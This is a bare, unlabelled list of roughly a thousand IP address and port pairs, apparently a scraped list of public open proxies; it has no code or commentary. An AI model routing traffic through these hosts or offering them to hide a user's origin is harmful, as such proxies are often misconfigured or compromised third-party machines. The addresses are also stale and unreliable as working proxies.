111.11.184.103:80 111.11.184.116:80 111.11.184.12:80 111.11.184.13:80 111.11.184.14:80 111.11.184.20:80 111.11.184.36:80 111.11.184.37:80 111.11.184.43:80 111.11.184.44:80 111.11.184.7:80 111.11.184.79:80 111.11.184.81:80 111.11.184.82:80 111.11.184.83:80 111.11.184.84:80 111.11.184.85:80 111.11.184.9:80 111.11.228.81:80 111.12.128.167:80 111.12.128.171:80 111.12.128.172:80 111.13.109.51:80 111.13.109.52:80 111.13.109.53:80 111.13.109.54:80 111.13.2.130:80 111.13.2.136:80 111.13.2.137:80 111.13.2.138:80 111.13.2.139:80 111.13.2.140:80 111.13.2.141:80 111.13.2.142:80 111.13.2.143:80 111.161.126.98:80 111.161.126.99:80 111.199.154.85:3128 111.206.81.248:80 111.221.1.254:8080 111.240.197.179:8088 111.240.97.94:9064 111.249.157.35:3128 111.249.95.80:9064 111.250.189.156:9064 111.250.233.6:3128 111.251.232.188:8088 111.252.249.231:8088 111.252.32.180:8088 111.254.142.200:8088 111.254.181.19:8088 111.254.45.161:9064 111.254.59.13:8088 111.3.82.148:8123 111.68.121.141:8080 111.7.129.140:80 111.7.129.140:8088 111.7.129.141:80 111.7.129.150:80 111.7.129.150:8088 111.7.129.151:80 111.7.129.151:8086 111.7.129.151:8088 111.7.129.160:80 111.7.129.162:80 111.8.20.136:80 111.8.20.141:80 111.9.124.150:8123 111.9.232.47:8123 111.9.233.113:8123 111.9.234.167:8123 111.9.234.193:8123 111.9.86.91:8123 111.93.234.98:3128 112.0.156.206:8123 112.1.184.23:8123 112.104.113.161:8088 112.105.215.77:8088 112.15.18.195:8123 112.17.0.201:80 112.17.0.202:80 112.17.0.203:80 112.17.0.204:80 112.17.0.205:80 112.17.0.211:80 112.17.0.213:80 112.17.0.214:80 112.17.0.215:80 112.17.0.216:80 112.18.165.199:8123 112.18.166.52:8123 112.18.171.122:8123 112.18.173.110:8123 112.18.174.31:8123 112.18.174.44:8123 112.18.176.104:8123 112.18.179.49:8123 112.18.196.121:8123 112.18.197.25:8123 112.18.21.195:8123 112.18.28.19:8123 112.18.52.252:8123 112.18.64.138:8123 112.18.72.137:8123 112.18.75.133:8123 112.18.88.48:8123 112.20.105.244:8123 112.20.122.50:8123 112.20.124.199:8123 112.20.148.163:8123 112.21.232.53:8123 112.22.126.72:8123 112.22.225.5:8123 112.22.228.9:8123 112.236.157.53:8585 112.24.124.157:8123 112.248.244.7:8585 112.25.43.3:3128 112.25.43.3:80 112.3.202.185:8123 112.44.229.135:8123 112.44.233.136:8123 112.44.247.170:8123 112.44.247.4:8123 112.5.16.50:80 112.65.18.17:8080 112.65.19.122:8080 112.65.212.74:3128 112.65.44.67:3128 112.91.208.78:9999 113.105.224.79:80 113.105.224.85:80 113.105.93.79:80 113.105.93.80:80 113.107.57.76:80 113.15.164.62:9999 113.162.133.235:80 113.19.87.107:8080 113.197.80.253:8080 113.200.220.151:8123 113.200.68.26:9000 113.201.63.12:80 113.214.13.1:8000 113.4.10.26:8118 113.53.249.131:8080 113.57.230.49:81 114.112.192.195:3128 114.231.23.140:8585 114.24.116.237:8088 114.24.172.68:8088 114.24.19.129:8088 114.24.4.19:8088 114.241.192.8:8585 114.247.120.114:3128 114.255.183.163:8080 114.255.183.173:8080 114.255.183.174:8080 114.26.241.175:9064 114.27.126.120:8088 114.27.126.49:8088 114.27.18.90:8088 114.27.5.18:9064 114.27.79.210:8088 114.36.6.48:9064 114.37.20.206:9064 114.37.26.213:8088 114.37.44.121:8088 114.38.196.145:8088 114.38.230.187:8088 114.38.36.200:8088 114.38.89.72:8088 114.39.187.196:8088 114.39.250.91:8088 114.40.110.122:9064 114.40.111.61:8088 114.40.205.50:9064 114.43.45.139:8088 114.44.0.98:8088 114.46.137.195:9064 114.66.229.2:80 114.79.135.42:9064 115.124.74.178:8080 115.236.59.194:3128 115.239.248.235:8080 116.228.55.217:8003 117.135.250.62:80 117.135.252.2:80 117.136.165.129:8123 117.139.28.168:8123 117.139.28.217:8123 117.139.39.75:8123 117.139.44.192:8123 117.139.47.69:8123 117.139.63.57:8123 117.139.65.237:8123 117.146.116.67:80 117.146.116.68:80 117.146.116.69:80 117.147.192.81:8123 117.147.195.68:8123 117.147.224.35:8123 117.147.246.181:8123 117.149.199.30:8123 117.149.218.110:8123 117.149.224.26:8123 117.149.234.93:8123 117.158.1.210:9999 117.162.124.188:8123 117.162.164.138:8123 117.162.168.201:8123 117.162.171.179:8123 117.162.173.237:8123 117.162.174.251:8123 117.162.193.126:8123 117.162.195.173:8123 117.162.201.77:8123 117.162.204.120:8123 117.162.216.173:8123 117.162.233.65:8123 117.162.238.139:8123 117.162.247.203:8123 117.162.70.148:8123 117.162.74.225:8123 117.162.80.48:8123 117.162.83.114:8123 117.162.84.146:8123 117.162.95.159:8123 117.163.109.69:8123 117.163.115.144:8123 117.163.119.129:8123 117.163.197.64:8123 117.163.202.212:8123 117.163.214.238:8123 117.163.216.119:8123 117.164.13.77:8123 117.164.151.112:8123 117.164.156.165:8123 117.164.157.188:8123 117.164.157.60:8123 117.164.158.249:8123 117.164.173.89:8123 117.164.205.150:8123 117.164.222.244:8123 117.164.28.112:8123 117.164.39.190:8123 117.164.58.11:8123 117.166.23.119:8123 117.166.237.137:8123 117.166.243.176:8123 117.166.41.70:8123 117.166.46.233:8123 117.166.74.162:8123 117.166.95.188:8123 117.166.96.26:8123 117.167.100.247:8123 117.169.207.95:8123 117.170.220.6:8123 117.170.222.231:8123 117.170.226.23:8123 117.170.230.73:8123 117.170.231.15:8123 117.170.231.18:8123 117.170.231.204:8123 117.170.242.116:8123 117.170.242.40:8123 117.170.4.99:8123 117.170.5.153:8123 117.170.5.177:8123 117.170.59.122:8123 117.170.7.95:8123 117.171.103.30:8123 117.171.124.96:8123 117.171.137.177:8123 117.171.162.167:8123 117.171.228.250:8123 117.171.231.2:8123 117.171.235.178:8123 117.171.235.205:8123 117.171.238.250:8123 117.171.26.6:8123 117.171.55.210:8123 117.171.64.214:8123 117.171.67.245:8123 117.173.20.220:8123 117.173.20.247:8123 117.173.20.32:8123 117.173.20.55:8123 117.173.245.229:8123 117.173.249.166:8123 117.173.254.165:8123 117.173.61.251:8123 117.174.1.198:8123 117.174.173.94:8123 117.174.195.207:8123 117.174.198.147:8123 117.174.200.136:8123 117.174.201.108:8123 117.174.209.27:8123 117.174.211.77:8123 117.174.223.247:8123 117.174.227.101:8123 117.174.228.204:8123 117.175.196.170:8123 117.175.212.88:8123 117.175.228.199:8123 117.175.229.134:8123 117.175.229.179:8123 117.175.229.75:8123 117.175.230.180:8123 117.175.241.196:8123 117.175.32.47:8123 117.176.185.24:8123 117.21.192.7:80 117.58.241.15:8080 117.59.217.240:80 117.59.217.240:81 117.59.217.240:82 117.59.217.240:83 118.95.177.186:9064 118.97.172.58:80 118.97.191.206:8080 118.97.66.4:8080 118.97.95.182:8080 118.99.85.7:8080 119.110.71.126:8080 119.254.76.225:808 119.4.115.51:8090 119.4.95.135:80 119.4.95.136:80 119.40.97.2:8080 119.48.23.15:9999 119.6.136.126:80 119.6.136.126:81 119.97.146.152:80 12.167.84.237:8080 120.194.107.149:9999 120.198.243.111:80 120.198.243.113:80 120.198.243.114:80 120.198.243.115:8080 120.198.243.115:8888 120.198.243.116:80 120.198.243.130:80 120.198.243.131:80 120.198.243.14:80 120.198.243.15:80 120.198.243.151:80 120.198.243.48:80 120.198.243.50:80 120.198.243.52:80 120.198.243.78:80 120.198.243.78:81 120.198.243.79:80 120.198.243.82:80 120.198.243.86:80 120.202.249.230:80 120.203.124.188:8123 120.203.151.29:8123 120.203.154.49:8123 120.203.158.99:8123 120.203.166.88:8123 120.203.173.68:8123 120.203.175.136:8123 120.203.214.144:80 120.203.214.144:81 120.203.214.144:82 120.203.214.144:83 120.203.214.144:84 120.203.214.147:80 120.203.214.147:81 120.203.214.147:82 120.203.214.147:83 120.203.214.147:84 120.203.214.151:80 120.203.214.183:80 120.203.214.187:80 120.203.214.187:9090 120.203.215.11:80 120.203.215.11:81 120.203.215.19:80 120.203.231.212:8123 120.203.232.192:8123 120.203.233.58:8123 120.206.109.21:8123 120.206.111.16:8123 120.206.112.25:8123 120.206.132.22:8123 120.206.132.41:8123 120.206.134.111:8123 120.206.139.70:8123 120.206.140.18:8123 120.206.140.49:8123 120.206.143.237:8123 120.206.143.30:8123 120.206.145.72:8123 120.206.147.125:8123 120.206.176.243:8123 120.206.194.66:8123 120.206.79.218:8123 122.156.137.188:8585 122.227.199.178:9999 122.254.25.136:9064 122.96.59.103:83 122.96.59.103:843 122.96.59.105:80 122.96.59.105:81 122.96.59.105:82 122.96.59.106:82 123.119.164.102:9000 123.150.207.105:80 123.177.20.220:80 123.195.188.190:9064 124.123.244.15:9064 124.123.42.135:9064 124.206.241.221:3128 124.240.187.79:82 124.240.187.79:83 124.240.187.80:80 124.240.187.81:83 124.6.135.170:3128 124.82.27.236:8080 124.88.67.19:80 125.164.125.239:3128 125.209.116.29:8080 125.212.193.2:3128 125.212.216.85:80 125.24.77.62:80 125.24.77.91:8080 125.24.78.154:80 125.24.78.223:8080 125.24.78.98:80 125.24.78.98:8080 125.24.79.234:80 125.24.79.235:8080 125.33.113.49:3128 125.39.66.66:80 125.39.66.67:80 125.39.66.68:80 125.39.66.75:80 125.39.66.75:8080 125.39.66.76:80 125.39.66.76:8080 125.42.176.208:9999 125.88.162.20:9999 125.88.255.143:80 125.88.255.144:80 125.89.74.233:3128 125.89.74.239:3128 125.89.74.240:3128 128.199.224.118:8080 130.0.25.162:8080 130.14.29.110:80 130.14.29.111:80 130.14.29.120:80 130.185.81.141:3128 131.155.186.8:3128 131.72.105.1:8080 133.18.6.22:80 139.193.62.12:8080 14.114.244.161:9999 14.136.79.252:9064 14.167.9.111:80 14.18.16.71:80 14.18.237.150:8085 140.109.57.11:9590 140.112.214.1:9064 140.113.156.111:9064 140.113.241.221:9064 140.116.88.78:8888 140.119.137.22:9064 140.121.197.169:8080 140.123.122.211:9064 140.129.1.183:3128 140.134.140.57:9064 140.206.86.70:8080 141.85.204.71:1920 146.148.66.106:80 146.185.149.184:3128 149.255.255.242:80 149.255.255.250:80 152.26.69.36:8080 152.26.69.37:8080 154.65.4.90:8080 158.58.172.207:13374 158.58.172.207:14826 158.58.172.207:15692 158.58.172.207:19279 158.58.172.207:33919 158.58.172.207:33948 158.58.172.207:33965 158.58.172.207:34015 158.58.172.207:80 159.255.167.147:8080 162.208.49.45:7808 162.208.49.45:8089 162.243.205.210:3128 163.125.206.206:9999 163.177.79.4:80 163.177.79.5:80 163.28.10.162:8888 163.53.187.98:8080 168.63.255.195:8080 171.12.3.71:81 173.201.185.40:80 175.101.16.72:80 175.101.16.72:8080 175.138.194.103:8080 175.184.250.18:8080 175.99.126.38:80 176.241.83.173:8080 176.73.252.139:3128 176.99.6.237:3128 177.104.25.130:3128 177.124.62.106:3128 177.130.92.69:3128 177.17.167.18:8080 177.200.82.234:8080 177.207.112.140:8080 177.22.111.120:8080 177.223.0.213:8080 177.54.192.163:8080 177.64.93.97:3128 177.67.100.82:8080 177.75.42.33:8080 177.80.18.115:3128 177.99.164.171:8080 177.99.74.182:8080 178.124.157.187:8080 178.137.138.96:8080 178.18.25.151:8888 178.219.248.15:8080 178.254.153.158:8080 178.32.72.26:8089 178.74.68.74:8080 178.77.243.110:443 179.154.253.192:3128 180.109.8.115:8585 180.174.62.185:80 180.176.102.224:9064 180.177.222.51:8088 180.183.25.223:3128 180.183.250.69:8080 180.183.51.139:3128 180.218.44.226:9064 180.242.40.184:8080 180.250.172.182:8080 180.250.215.251:8080 180.250.43.88:8080 180.250.44.250:80 181.208.104.156:9064 181.225.58.104:9064 181.49.15.162:3128 181.72.4.115:9064 181.73.26.240:9064 182.118.23.7:8081 182.18.161.71:3128 182.235.110.89:8088 182.235.133.197:8088 182.235.169.169:9064 182.235.222.142:9064 182.239.127.137:80 182.239.127.140:80 182.239.95.134:80 182.239.95.136:80 182.239.95.137:80 182.239.95.139:80 182.254.178.190:3128 182.254.212.164:80 182.254.221.192:8080 182.30.3.169:8080 182.36.82.12:8585 182.48.116.51:8080 182.52.49.157:80 182.70.37.75:3128 183.203.12.166:80 183.203.22.68:80 183.203.22.81:80 183.203.22.87:80 183.203.22.90:80 183.203.22.91:80 183.203.22.96:80 183.203.22.97:80 183.203.23.18:80 183.203.8.147:8080 183.203.8.148:8080 183.206.87.177:8123 183.207.224.13:80 183.207.224.14:80 183.207.224.42:80 183.207.224.43:80 183.207.224.44:80 183.207.224.45:80 183.207.224.47:80 183.207.224.48:80 183.207.224.49:80 183.207.224.49:81 183.207.224.50:81 183.207.224.50:85 183.207.224.51:83 183.207.224.51:84 183.207.224.52:80 183.207.224.52:81 183.207.229.12:80 183.207.229.12:8000 183.207.229.13:80 183.207.229.13:9000 183.207.229.139:80 183.207.229.194:80 183.207.229.195:80 183.207.229.199:80 183.207.229.202:80 183.207.229.203:80 183.207.237.11:80 183.207.237.18:80 183.207.237.18:81 183.207.237.21:80 183.208.196.120:8123 183.208.197.72:8123 183.208.200.131:8123 183.208.201.107:8123 183.208.213.193:8123 183.208.214.53:8123 183.208.222.149:8123 183.208.222.53:8123 183.208.35.12:8123 183.209.102.9:8123 183.209.107.226:8123 183.209.7.236:8123 183.211.110.131:8123 183.211.116.163:8123 183.211.5.29:8123 183.211.70.92:8123 183.211.72.156:8123 183.212.85.65:8123 183.212.95.68:8123 183.216.174.60:8123 183.216.176.124:8123 183.216.182.103:8123 183.216.189.171:8123 183.216.31.212:8123 183.216.57.48:8123 183.216.62.5:8123 183.217.140.33:8123 183.217.142.171:8123 183.217.189.61:8123 183.217.202.204:8123 183.217.204.233:8123 183.217.206.200:8123 183.217.232.56:8123 183.217.243.156:8123 183.218.103.32:8123 183.218.108.243:8123 183.218.122.95:8123 183.218.67.18:8123 183.218.85.93:8123 183.219.136.247:8123 183.219.137.144:8123 183.219.138.212:8123 183.219.140.46:8123 183.219.149.178:8123 183.219.153.83:8123 183.219.160.162:8123 183.219.2.65:8123 183.219.247.96:8123 183.219.248.70:8123 183.219.249.61:8123 183.219.46.155:8123 183.219.5.241:8123 183.219.50.200:8123 183.219.6.122:8123 183.219.83.67:8123 183.219.85.151:8123 183.219.88.140:8123 183.219.89.69:8123 183.219.90.133:8123 183.219.91.24:8123 183.219.94.67:8123 183.220.194.59:8123 183.220.199.223:8123 183.220.240.15:8123 183.220.240.240:8123 183.220.241.218:8123 183.220.245.2:8123 183.220.246.160:8123 183.220.247.135:8123 183.220.247.243:8123 183.220.44.239:8123 183.220.45.139:8123 183.221.147.193:8123 183.221.160.29:8123 183.221.164.91:8123 183.221.174.192:8123 183.221.175.177:8123 183.221.186.167:8123 183.221.188.161:8123 183.221.191.187:8123 183.221.191.198:8123 183.221.191.240:8123 183.221.208.185:8123 183.222.152.197:8123 183.222.153.242:8123 183.222.154.162:8123 183.222.156.12:8123 183.222.156.51:8123 183.222.157.227:8123 183.222.158.10:8123 183.222.158.150:8123 183.222.159.250:8123 183.222.160.21:8123 183.222.161.78:8123 183.222.163.68:8123 183.222.171.236:8123 183.222.174.137:8123 183.222.176.113:8123 183.222.183.37:8123 183.222.255.144:8123 183.222.87.110:8123 183.222.87.239:8123 183.223.16.2:8123 183.223.171.241:8123 183.223.172.31:8123 183.223.173.175:8123 183.223.35.63:8123 183.224.1.30:80 183.224.12.76:80 183.224.12.81:80 183.227.210.73:8123 183.228.142.252:8123 183.228.142.78:8123 183.228.156.176:8123 183.228.176.207:8123 183.228.176.47:8123 183.228.177.3:8123 183.228.179.113:8123 183.228.180.85:8123 183.228.182.71:8123 183.228.200.133:8123 183.228.201.154:8123 183.228.205.64:8123 183.228.206.3:8123 183.228.209.120:8123 183.228.209.6:8123 183.228.210.248:8123 183.228.222.175:8123 183.228.238.59:8123 183.228.239.134:8123 183.228.239.70:8123 183.228.243.115:8123 183.228.243.147:8123 183.228.249.139:8123 183.228.251.7:8123 183.228.39.228:8123 183.228.39.246:8123 183.228.39.68:8123 183.228.40.4:8123 183.228.41.213:8123 183.228.42.183:8123 183.228.68.178:8123 183.228.78.93:8123 183.228.79.184:8123 183.228.88.130:8123 183.228.88.46:8123 183.230.53.153:8123 183.247.235.21:8123 183.249.23.148:8123 183.249.33.202:8123 183.249.6.133:80 183.57.78.62:8085 183.82.131.183:9064 183.83.108.60:9064 183.83.87.150:9064 183.89.78.116:8080 183.89.92.242:3128 184.105.18.253:8085 186.136.180.233:8080 186.89.130.234:9064 186.89.253.70:8080 186.89.65.213:8080 186.89.90.103:9064 186.90.78.254:9064 186.90.79.190:8080 186.91.95.149:9064 186.92.112.11:8080 186.92.155.55:9064 186.92.163.128:9064 186.92.173.190:9064 186.92.198.65:8080 186.92.199.190:8080 186.92.199.246:8080 186.92.228.141:9064 186.92.4.99:9064 186.92.45.190:8080 186.93.111.198:8080 186.93.153.85:8080 186.93.19.34:9064 186.93.2.196:9064 186.93.203.224:8080 186.93.231.228:8080 186.93.30.229:9064 186.94.127.192:8080 186.94.143.54:8080 186.94.146.142:9064 186.94.190.53:9064 186.94.2.57:8080 186.94.224.8:9064 186.94.225.192:9064 186.94.241.175:9064 186.94.253.225:9064 186.94.34.32:8080 186.94.35.87:9064 186.94.59.50:8080 186.94.64.115:8080 186.95.228.109:8080 186.95.243.202:9064 186.95.47.172:8080 186.95.50.205:9064 186.96.253.146:8080 187.120.34.166:3128 187.120.34.246:3128 187.120.34.25:3128 187.120.34.66:3128 187.72.134.241:3128 187.73.175.23:3128 189.84.176.185:3128 189.85.20.189:8080 190.0.48.2:8080 190.128.238.38:8080 190.153.116.27:8080 190.183.115.148:9064 190.183.177.235:9064 190.184.144.174:8080 190.184.144.78:8080 190.198.134.200:9064 190.198.154.226:8080 190.198.178.228:9064 190.198.180.106:9064 190.198.2.148:8080 190.198.216.80:8080 190.198.227.114:8080 190.198.254.141:8080 190.198.27.169:9064 190.198.27.97:9064 190.198.80.240:8080 190.199.183.246:9064 190.199.218.90:8080 190.199.67.95:8080 190.199.71.123:9064 190.200.155.27:8080 190.200.157.6:8080 190.200.16.228:9064 190.200.185.216:9064 190.200.189.115:9064 190.200.217.151:8080 190.201.142.135:8080 190.201.154.134:9064 190.201.165.152:9064 190.201.167.141:9064 190.201.170.94:9064 190.201.216.72:9064 190.201.40.238:9064 190.202.194.152:9064 190.202.244.165:8080 190.203.132.250:8080 190.203.201.100:8080 190.203.239.67:8080 190.203.43.97:9064 190.204.1.2:9064 190.204.101.28:8080 190.204.122.129:8080 190.204.160.33:8080 190.204.168.253:8080 190.204.173.227:8080 190.204.242.235:8080 190.204.255.232:8080 190.204.26.213:9064 190.204.29.122:9064 190.204.55.110:9064 190.204.67.235:9064 190.205.123.55:8080 190.205.127.253:8080 190.205.192.9:8080 190.205.193.204:9064 190.205.196.77:9064 190.205.202.104:8080 190.205.220.126:8080 190.205.225.226:9064 190.207.149.102:8080 190.207.185.119:8080 190.207.200.185:8080 190.207.203.228:8080 190.207.208.168:9064 190.207.219.164:3128 190.207.228.97:9064 190.207.24.170:8080 190.207.253.107:9064 190.207.34.65:8080 190.207.56.83:9064 190.207.63.222:8080 190.217.215.194:9064 190.36.11.61:9064 190.36.143.123:8080 190.36.152.23:9064 190.36.154.15:8080 190.36.214.44:8080 190.36.72.1:9064 190.36.8.130:9064 190.36.8.26:9064 190.37.122.118:8080 190.37.122.163:8080 190.37.164.82:9064 190.37.165.72:9064 190.37.211.186:9064 190.37.224.236:8080 190.37.225.158:8080 190.37.231.178:8080 190.37.232.155:8080 190.37.239.21:9064 190.37.34.104:8080 190.37.48.121:8080 190.37.57.100:8080 190.37.77.86:8080 190.38.122.59:9064 190.38.123.239:9064 190.38.157.98:9064 190.38.178.28:8080 190.38.218.87:8080 190.38.29.145:9064 190.38.44.178:8080 190.38.45.9:8080 190.38.5.195:8080 190.38.54.32:8080 190.38.64.85:8080 190.38.68.219:8080 190.38.88.204:9064 190.38.94.86:8080 190.38.97.254:9064 190.39.105.142:9064 190.39.107.127:8080 190.39.169.183:9064 190.39.252.172:9064 190.39.67.73:8080 190.39.68.174:8080 190.39.75.247:8080 190.39.94.169:8080 190.40.123.36:8080 190.44.73.74:9064 190.52.32.126:3128 190.72.120.118:9064 190.72.15.242:8080 190.72.15.87:8080 190.72.153.86:8080 190.72.157.20:9064 190.72.191.194:9064 190.72.225.106:8080 190.72.6.206:9064 190.73.105.81:8080 190.73.11.143:8080 190.73.185.34:9064 190.73.216.119:8080 190.73.233.182:8080 190.73.252.90:9064 190.73.96.171:8080 190.74.146.224:8080 190.74.162.46:9064 190.74.165.158:8080 190.74.165.207:9064 190.74.168.149:8080 190.74.180.79:8080 190.74.186.36:9064 190.74.199.171:8080 190.74.200.117:9064 190.74.202.231:9064 190.74.203.4:8080 190.74.90.109:9064 190.75.137.251:9064 190.75.139.217:8080 190.75.139.61:9064 190.75.194.53:8080 190.75.206.79:9064 190.75.211.152:9064 190.75.238.227:9064 190.75.239.216:9064 190.75.33.152:9064 190.75.35.65:8080 190.77.219.159:8080 190.77.221.130:9064 190.77.230.141:8080 190.77.245.52:9064 190.78.151.16:9064 190.78.178.185:9064 190.78.178.6:8080 190.78.23.90:8080 190.78.24.108:9064 190.78.98.178:9064 190.78.99.152:9064 190.79.105.115:8080 190.79.107.130:9064 190.79.151.178:8080 190.79.222.12:9064 190.79.6.136:9064 190.94.202.13:9064 190.94.216.250:9064 190.98.205.107:80 191.105.121.101:9064 191.240.57.212:8080 191.241.76.52:8080 191.37.238.135:8080 191.37.238.169:8080 192.163.255.175:3128 192.3.104.245:80 192.3.162.138:3128 192.99.3.129:3128 194.125.224.125:3128 194.126.140.247:80 194.186.43.22:3128 194.213.60.227:8585 194.247.12.106:3128 194.247.165.118:8080 194.44.153.89:3128 194.8.248.22:3128 195.114.125.81:8080 195.154.77.104:3128 198.251.67.194:8080 198.46.103.108:80 198.52.217.44:7808 198.52.217.44:8089 198.71.193.192:80 198.71.213.94:80 199.167.228.36:80 199.200.120.140:8089 199.200.120.36:7808 199.200.120.37:7808 200.109.137.60:8080 200.112.211.16:8080 200.124.112.24:3128 200.143.198.83:3128 200.174.182.103:8080 200.192.248.94:8080 200.223.4.138:8081 200.242.145.3:3128 200.69.206.157:8080 200.90.86.38:8080 200.93.69.164:9064 201.208.204.219:9064 201.208.30.218:8080 201.208.37.148:8080 201.209.198.47:9064 201.209.220.178:8080 201.209.233.75:9064 201.209.240.8:9064 201.209.31.248:8080 201.209.47.77:9064 201.209.53.85:9064 201.210.222.209:9064 201.210.233.167:8080 201.210.249.226:9064 201.210.69.228:8080 201.211.109.142:8080 201.211.120.56:8080 201.211.129.156:9064 201.22.217.194:8080 201.221.131.62:8080 201.221.131.92:8080 201.221.132.69:3128 201.221.133.182:8080 201.238.203.66:3128 201.240.215.147:3128 201.242.185.129:8080 201.242.80.177:8080 201.242.93.133:9064 201.242.93.177:8080 201.243.104.100:9064 201.243.111.111:9064 201.243.126.125:8080 201.243.16.66:8080 201.243.175.209:9064 201.243.207.40:9064 201.243.96.183:8080 201.243.96.251:8080 201.248.18.112:8080 201.248.9.40:9064 201.55.143.1:3128 202.103.150.70:8088 202.108.50.75:80 202.109.163.75:8085 202.112.114.27:3128 202.117.1.122:8080 202.120.188.104:80 202.133.104.106:80 202.133.104.106:8080 202.141.225.126:8080 202.152.6.10:80 202.152.6.10:8080 202.152.61.44:8080 202.169.225.204:80 202.169.225.204:8080 202.171.253.134:80 202.171.253.135:80 202.171.253.72:80 202.171.253.84:85 202.171.253.84:86 202.29.238.242:3128 202.53.170.134:8080 202.77.115.71:54321 202.78.206.83:8080 202.91.73.30:8080 202.99.172.244:3128 203.128.71.247:8080 203.151.21.184:3128 203.176.136.66:8080 203.195.132.244:3128 203.202.250.98:3128 203.73.233.144:8088 203.81.67.86:8080 207.108.136.68:443 209.150.233.83:80 210.101.131.232:8080 210.13.105.23:8080 210.140.155.65:80 210.186.158.210:9064 210.209.72.236:80 210.245.20.170:80 210.65.10.76:3128 210.70.253.27:3128 210.73.218.136:3128 210.82.92.77:3128 211.138.121.37:80 211.138.121.37:81 211.138.121.37:82 211.138.121.37:83 211.138.121.37:84 211.138.121.38:80 211.138.121.38:81 211.138.121.38:82 211.138.121.38:83 211.138.60.16:80 211.138.60.18:80 211.139.45.22:8123 211.143.146.239:80 211.143.146.239:82 211.143.146.239:83 211.143.146.239:843 211.155.230.38:808 211.166.8.27:80 212.156.157.86:8080 212.158.155.22:8080 212.200.131.83:80 212.200.131.83:8080 216.120.236.190:3128 217.12.215.22:3128 218.108.232.99:80 218.166.101.107:8088 218.173.47.80:9064 218.173.73.10:9064 218.201.21.142:80 218.201.21.145:80 218.201.21.148:80 218.201.21.153:80 218.201.38.49:80 218.203.13.169:80 218.203.13.169:81 218.203.13.169:82 218.203.13.169:83 218.203.13.169:84 218.203.13.172:80 218.203.13.173:80 218.203.13.175:80 218.203.13.176:80 218.203.13.177:80 218.204.120.37:8123 218.204.156.111:8123 218.204.159.57:8123 218.206.83.89:80 218.207.10.178:8123 218.207.17.163:8123 218.207.172.236:80 218.207.172.237:80 218.207.51.19:8123 218.207.52.55:8123 218.207.55.162:8123 218.26.13.155:63000 218.27.136.169:8085 218.28.96.39:3128 218.29.155.198:9999 218.29.90.30:9999 218.75.205.124:9999 218.75.205.57:9999 219.93.183.106:8080 220.129.173.150:9064 220.136.166.222:9064 220.173.235.202:9999 220.231.32.195:3128 221.0.182.5:808 221.172.143.166:9000 221.176.14.72:80 221.178.119.219:8123 221.178.119.233:8123 221.178.121.198:8123 221.178.124.80:8123 221.178.127.170:8123 221.178.24.55:8123 221.178.28.215:8123 221.178.29.169:8123 221.178.30.200:8123 221.178.30.253:8123 221.178.30.30:8123 221.178.32.109:8123 221.178.53.85:8123 221.178.54.134:8123 221.178.55.55:8123 221.178.78.102:8123 221.178.83.50:8123 221.178.84.49:8123 221.178.86.157:8123 221.178.86.224:8123 221.178.98.82:8123 221.178.99.130:8123 221.180.130.48:80 221.180.130.49:80 221.180.130.50:80 221.180.130.51:80 221.180.147.30:80 221.180.147.30:81 221.180.147.30:83 221.180.147.30:86 221.182.110.141:8123 221.182.62.114:9999 221.182.62.32:8123 221.182.74.154:8123 221.182.74.46:8123 221.182.75.186:8123 221.182.75.205:8123 221.182.75.80:8123 221.183.16.219:80 221.231.135.149:80 221.5.69.51:80 221.5.69.51:8000 222.124.149.178:3128 222.129.205.199:9000 222.132.29.10:8080 222.246.232.55:80 222.35.17.177:8080 222.50.14.100:9000 222.66.97.75:8080 222.85.1.123:8118 222.85.103.192:81 222.85.149.4:3128 222.88.236.236:81 222.88.236.236:82 222.88.236.236:83 222.88.242.213:9999 223.252.33.209:23684 223.66.80.235:8123 223.67.148.169:8123 223.82.14.151:8123 223.82.169.151:8123 223.82.171.161:8123 223.82.171.176:8123 223.82.203.120:8123 223.82.204.182:8123 223.82.217.177:8123 223.82.217.28:8123 223.82.218.166:8123 223.82.37.67:8123 223.82.39.59:8123 223.82.42.148:8123 223.82.67.22:8123 223.82.74.214:8123 223.83.136.97:8123 223.83.137.26:8123 223.83.141.95:8123 223.83.201.241:8123 223.83.206.200:8123 223.84.130.224:8123 223.84.131.211:8123 223.84.133.12:8123 223.84.138.112:8123 223.84.143.179:8123 223.84.145.42:8123 223.84.147.193:8123 223.84.160.160:8123 223.84.19.45:8123 223.84.195.89:8123 223.84.206.174:8123 223.84.206.44:8123 223.84.216.238:8123 223.84.221.130:8123 223.84.229.77:8123 223.84.232.62:8123 223.84.82.206:8123 223.86.122.39:8123 223.86.127.219:8123 223.86.127.27:8123 223.86.127.57:8123 223.86.171.47:8123 223.86.215.67:8123 223.86.216.148:8123 223.86.217.177:8123 223.86.217.37:8123 223.86.218.118:8123 223.86.218.22:8123 223.86.219.193:8123 223.86.223.179:8123 223.86.3.124:8123 223.86.32.6:8123 223.86.40.248:8123 223.86.6.44:8123 223.86.66.238:8123 223.86.67.105:8123 223.86.67.61:8123 223.86.7.110:8123 223.86.7.221:8123 223.86.7.51:8123 223.86.7.63:8123 223.86.72.148:8123 223.86.9.83:8123 223.87.108.106:8123 223.87.114.209:8123 223.87.159.77:8123 223.87.183.43:8123 223.87.62.203:8123 223.87.76.128:8123 223.99.188.73:8090 223.99.188.74:8090 23.226.131.196:8080 23.232.196.1:80 23.232.196.10:80 23.232.196.13:80 23.232.196.14:80 23.232.196.2:80 23.232.196.4:80 27.109.140.205:80 27.115.18.18:8080 27.131.190.66:8080 27.131.47.131:8080 27.145.145.105:8080 27.187.155.71:8088 27.3.142.237:9064 27.5.192.190:9064 27.50.128.242:88 31.15.48.12:80 31.3.246.183:7080 31.7.232.102:3128 36.224.219.91:8088 36.226.118.20:9064 36.227.225.141:8088 36.227.4.45:8088 36.231.127.68:8088 36.250.69.4:80 36.250.74.87:80 36.250.74.88:80 36.73.141.145:31281 36.74.37.6:8888 36.78.128.251:31281 36.80.35.69:8080 37.131.208.141:8080 37.157.192.146:3128 37.236.167.250:80 37.239.46.10:80 37.239.46.18:80 37.239.46.50:80 37.239.46.58:80 37.60.66.108:8080 37.60.66.109:8080 41.188.49.163:3128 41.73.230.39:8080 41.89.96.36:3128 42.117.3.73:3128 42.202.146.58:8080 42.62.61.245:80 46.32.231.84:80 49.113.241.95:8585 49.204.134.166:9064 49.204.176.99:9064 49.207.213.194:9064 49.207.217.125:9064 49.207.227.208:9064 49.207.29.74:9064 5.102.108.198:80 5.135.98.240:80 5.153.230.44:80 5.196.5.145:3128 58.146.102.176:9064 58.248.156.53:9999 58.248.156.54:9999 58.248.80.61:9999 58.248.81.11:9999 58.251.78.71:8088 58.252.0.25:9999 58.253.238.242:80 58.253.238.243:80 58.42.236.241:80 